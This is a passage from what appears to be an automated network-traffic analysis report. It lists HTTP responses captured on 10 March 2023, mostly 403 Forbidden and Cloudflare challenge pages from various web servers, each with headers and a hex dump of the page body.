{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SaH844WfRUjznVDaZqcscXobWSqwAWEeZ4ip6Nbzf0to7tWUXsiFJPrkZ3hZiV8i23qQOE2o5236r36f0C00TX4gakSdgHcm8jq8tiyMTVTOcr%2FFeodY5ph1pLev"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8320fdd6904-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 Data Ascii: 1c3c<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XOyNRX6SdVWrQbw1f4SugWgOurHq8K4oWkqMeOtjqbIil2ds7T8kz3M8nh1gwFVDp%2BYqINPH%2Fbkc%2BiMK5qafDNvEEduZLE8R7yge8kzobGKCtqfJpf%2FlajGz335%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8332e189b4c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 36 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: 1c67<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:18 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:18 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:18 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: jezGIZW2/4ziDeW0jData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Fri, 10 Mar 2023 06:56:18 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 10 Mar 2023 06:56:19 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:19 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:20:42 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:19 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:19 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:19 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:19 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:20:42 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:19 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:19 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 